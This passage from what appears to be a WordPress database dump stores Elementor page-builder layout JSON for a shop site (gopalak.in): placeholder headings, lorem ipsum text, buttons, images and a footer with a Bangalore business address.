":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e6bf144\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"4958df1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"48ae73c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4fbe7c9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7f118ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"1094c04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"23f1949\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"564a60c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4f7aa47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6b7196e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"db3e45f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"c6757ae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f80f2bc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"fe9d098\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1279df7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"61ee343\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1189e91\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#E2E4E28C\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#FF8236\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8617,1503,'_elementor_page_assets','a:0:{}'),(8620,1504,'_elementor_edit_mode','builder'),(8621,1504,'_elementor_template_type','wp-page'),(8622,1504,'_elementor_version','3.7.7'),(8623,1504,'_wp_page_template','elementor_canvas'),(8624,1504,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\",\"_margin\":{\"unit\":\"px\",\"top\":\"-24\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da958fb\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#DDD6D636\"},\"elements\":[{\"id\":\"708fcb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"52f19eb\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"Accordion #1\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c1c0cb1\"},{\"tab_title\":\"Accordion #2\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c81da6b\"},{\"_id\":\"de1d949\",\"tab_title\":\"Accordion Title\"},{\"_id\":\"cb17b05\",\"tab_title\":\"Accordion Title\"}],\"faq_schema\":\"yes\",\"border_width\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_element_width\":\"inherit\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e357abe\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b3b6eb2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"20a83dc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bc85492\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"a53f4e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"88d8734\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"006d2d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"fb06b27\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6df56a4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"3427821\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"981ddd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"769b005\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ef95559\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"4c2bf26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"550a2fe\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"d29feb9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"c8fdf6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5bf1ad\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"9453712\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"e15dab4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c1b003\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"71c81df\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f37c86d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f839c1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0d6b040\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e374c42\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"27bc579\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e6bf144\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"4958df1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"48ae73c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4fbe7c9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7f118ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"1094c04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"23f1949\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"564a60c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4f7aa47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6b7196e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"db3e45f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"c6757ae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f80f2bc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"fe9d098\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1279df7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"61ee343\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1189e91\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#E2E4E28C\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem 